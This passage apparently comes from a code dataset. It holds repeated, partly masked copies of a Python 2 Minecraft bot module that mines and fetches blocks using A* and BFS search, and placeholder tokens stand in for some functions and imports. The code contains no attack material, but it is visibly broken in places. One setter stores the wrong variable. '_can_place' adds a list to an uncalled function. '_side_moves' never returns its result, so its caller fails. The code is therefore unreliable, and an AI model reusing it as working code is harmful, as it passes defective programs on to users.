loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n 